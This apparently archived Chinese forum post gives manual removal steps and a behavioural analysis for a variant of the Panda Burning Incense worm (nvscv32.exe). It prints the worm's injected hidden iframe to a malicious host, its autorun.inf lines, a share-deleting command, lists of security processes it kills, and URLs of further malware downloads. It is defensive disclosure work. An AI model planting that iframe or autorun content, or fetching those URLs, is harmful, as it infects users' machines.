熊猫烧香病毒nvscv32.exe变种手动清除方案

phper 发表于 2008-4-14 01:16:08

编者按：PConline提供了一种针对熊猫烧香病毒nvscv32.exe变种的查杀办法。据调查此变种于16日出现。笔者有幸于17日与“熊猫烧香病毒nvscv32.exe变种”亲密接触，并用以下方法将其清除。推荐使用第一种方法。
　　一、PConline提供的解决方案
　　1.拔网线；
　　2.重新进入WinXP安全模式，熊猫烧香病毒进程没有加载，可使用“任务管理器”！（提示：开机后按住F8）
　　3.删除病毒文件：%SystemRoot%system32drivers vscv32.exe。
　　4.开始菜单=>运行，运行msconfig命令。在“系统配置实用程序”中，取消与nvscv32.exe相关的进程。也可使用超级兔子魔法设置、HijackThis等，删除nvscv32.exe的注册表启动项。
　　<IMG onclick=get_larger(this) src="http://img.ddvip.com/2007_02/1172235472_ddvip_3297.jpg">
　　取消熊猫烧香病毒进程的启动
　　5.下载并使用江民专杀工具，修复被感染的exe文件。并及时打上Windows补丁。
　　6.清除html/asp/php等，所有网页文件中如下代码：（为防止传播代码有三处修改，请将“。”换为“.”）
　　<iframe src=http://www。krvkr。com/worm。htm width=”0” height=”0”></iframe>
　　批量清除恶意代码的方法：
<LI>　　可使用Dreamweaver的批量替换。 
　　<IMG onclick=get_larger(this) src="http://img.ddvip.com/2007_02/1172235472_ddvip_4487.jpg">
　　Dreamweaver批理替换的使用方法
<LI>　　可下载使用<A href="http://www.brinesoft.com/Downloads.asp">BatchTextReplacer</A>批量替换。 
<LI>　　部署了Symantec AntiVirus的企业，升级到最新病毒库扫描全盘文件，即可清除被添加的恶意代码和清除病毒文件。 
　　7.用安装杀毒软件，并升级病毒库，扫描整个硬盘，清除其他病毒文件。推荐PConline多次推荐的“免费卡巴斯基”——Active Virus Sheild。（xxxxxxxxxxxxx）（注：步骤7不能与步骤5调换，以免可修复的带毒文件被删除！）
　　8.删除每个盘根目录下的autorun.inf文件，利用搜索功能，将Desktop_.ini全部删除。
　　二、互联安全网提供的解决方法（后文的病毒描述、中毒现象和技术分析均来自互联安全网）
　　1：关闭网络共享，断开网络。
　　2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前）
　　3：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
　　ExplorerAdvancedFolderHiddenSHOWALL CheckedValue的数值改为1
　　4：删除注册表启动项
　　
　　nvscv32: "C:WINDOWSsystem32drivers vscv32.exe"
　　5：删除C:WINDOWSsystem32drivers vscv32.exe
　　6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。
　　7：如果电脑上有脚本文件，将病毒代码全部删除。
　　8：关闭系统的自动播放功能。
　　这样就基本上将病毒清除了。
　　三、病毒描述
　　含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。
　　文件名称：nvscv32.exe
　　病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商）
　　中文名称：（尼姆亚，熊猫烧香）
　　病毒大小：68,570 字节
　　编写语言：Borland Delphi 6.0 - 7.0
　　加壳方式：FSG 2.0 -> bart/xt
　　发现时间：2007.1.16
　　危害等级：高
　　四、中毒现象
　　1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。</LI>
<LI>
　　2：无法手工修改“文件夹选项”将隐藏文件显示出来。
　　3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期如：2007-1-16
　　4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>
　　5：中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。
　　6：不能正常使用任务管理器，SREng.exe等工具。
　　7：无故的向外发包，连接局域网中其他机器。
　　五、技术分析
　　1：病毒文件运行后，将自身复制到%SystemRoot%system32drivers vscv32.exe
　　建立注册表自启动项：
　　
　　nvscv32: "C:WINDOWSsystem32drivers vscv32.exe"
　　2：查找反病毒窗体病毒结束相关进程：</LI>
<LI>　　天网防火墙 
<LI>　　virusscan 
<LI>　　symantec antivirus 
<LI>　　system safety monitor 
<LI>　　system repair engineer 
<LI>　　wrapped gift killer 
<LI>　　游戏木马检测大师 
<LI>　　超级巡警 
　　3：结束以下进程
<LI>　　mcshield.exe 
<LI>　　vstskmgr.exe 
<LI>　　naprdmgr.exe 
<LI>　　updaterui.exe 
<LI>　　tbmon.exe 
<LI>　　scan32.exe 
<LI>　　ravmond.exe 
<LI>　　ccenter.exe 
<LI>　　ravtask.exe 
<LI>　　rav.exe 
<LI>　　ravmon.exe 
<LI>　　ravmond.exe 
<LI>　　ravstub.exe 
<LI>　　kvxp.kxp 
<LI>　　kvmonxp.kxp 
<LI>　　kvcenter.kxp 
<LI>　　kvsrvxp.exe 
<LI>　　kregex.exe 
<LI>　　uihost.exe 
<LI>　　trojdie.kxp 
<LI>　　frogagent.exe 
<LI>　　kvxp.kxp 
<LI>　　kvmonxp.kxp 
<LI>　　kvcenter.kxp 
<LI>　　kvsrvxp.exe 
<LI>　　kregex.exe 
<LI>　　uihost.exe 
<LI>　　trojdie.kxp 
<LI>　　frogagent.exe 
<LI>　　logo1_.exe 
<LI>　　logo_1.exe 
<LI>　　rundl132.exe 
<LI>　　taskmgr.exe 
<LI>　　msconfig.exe 
<LI>　　regedit.exe 
<LI>　　sreng.exe　 
　　4：禁用下列服务
<LI>　　schedule 
<LI>　　sharedaccess 
<LI>　　rsccenter 
<LI>　　rsravmon 
<LI>　　rsccenter 
<LI>　　kvwsc 
<LI>　　kvsrvxp 
<LI>　　kvwsc 
<LI>　　kvsrvxp 
<LI>　　kavsvc 
<LI>　　avp 
<LI>　　avp 
<LI>　　kavsvc 
<LI>　　mcafeeframework 
<LI>　　mcshield 
<LI>　　mctaskmanager 
<LI>　　mcafeeframework 
<LI>　　mcshield 
<LI>　　mctaskmanager 
<LI>　　navapsvc 
<LI>　　wscsvc 
<LI>　　kpfwsvc 
<LI>　　sndsrvc 
<LI>　　ccproxy 
<LI>　　ccevtmgr 
<LI>　　ccsetmgr 
<LI>　　spbbcsvc 
<LI>　　symantec core lc 
<LI>　　npfmntor 
<LI>　　mskservice 
<LI>　　firesvc 
　　5：删除下列注册表项：</LI>
<LI>
softwaremicrosoftwindowscurrentversion un avtask </LI>
<LI>　　softwaremicrosoftwindowscurrentversion unkvmonxp 
<LI>　　softwaremicrosoftwindowscurrentversion unkav 
<LI>　　softwaremicrosoftwindowscurrentversion unkavpersonal50 
<LI>　　softwaremicrosoftwindowscurrentversion unmcafeeupdaterui 
<LI>　　softwaremicrosoftwindowscurrentversion un etwork associates error reporting service 
<LI>　　softwaremicrosoftwindowscurrentversion unshstatexe 
<LI>　　softwaremicrosoftwindowscurrentversion unylive.exe 
<LI>　　softwaremicrosoftwindowscurrentversion unyassistse 
　　6：感染所有可执行文件，并将图标改成<IMG onclick=get_larger(this) src="http://img.ddvip.com/2007_02/1172235473_ddvip_8745.jpg">（这次不是熊猫烧香那个图标了）
　　7：跳过下列目录:
<LI>　　windows 
<LI>　　winnt 
<LI>　　systemvolumeinformation 
<LI>　　recycled 
<LI>　　windowsnt 
<LI>　　windowsupdate 
<LI>　　windowsmediaplayer 
<LI>　　outlookexpress 
<LI>　　netmeeting 
<LI>　　commonfiles 
<LI>　　complusapplications 
<LI>　　commonfiles 
<LI>　　messenger 
<LI>　　installshieldinstallationinformation 
<LI>　　msn 
<LI>　　microsoftfrontpage 
<LI>　　moviemaker 
<LI>　　msngaminzone 
　　8：删除*.gho备份文件。
　　9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统。
　　autorun.inf内容：
　　
　　OPEN=setup.exe
　　shellexecute=setup.exe
　　shellAutocommand=setup.exe
　　10：删除共享：cmd.exe /c net share admin$ /del /y</LI>
<LI>
　　11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。
　　12：扫描局域网机器，一旦发现漏洞，就迅速传播。
　　13：在后台访问http：//www。whboy。net/update/wormcn。txt，根据下载列表下载其他病毒。
　　目前下载列表如下：（以下链接均为危险内容，请勿点击！）</LI>
<LI>　　http://www.krvkr.com/down/cq.exe 
<LI>　　http://www.krvkr.com/down/mh.exe 
<LI>　　http://www.krvkr.com/down/my.exe 
<LI>　　http://www.krvkr.com/down/wl.exe 
<LI>　　http://www.krvkr.com/down/rx.exe 
<LI>　　http://www.krvkr.com/down/wow.exe 
<LI>　　http://www.krvkr.com/down/zt.exe 
<LI>　　http://www.krvkr.com/down/wm.exe 
<LI>　　http://www.krvkr.com/down/dj.exe 
<LI>　　http://www.krvkr.com/cn/iechajian.exe 
　　到此病毒行为分析完毕。</LI>

bingshui 发表于 2009-1-5 08:00:01

页: [1]

网络实验室's Archiver

熊猫烧香病毒nvscv32.exe变种手动清除方案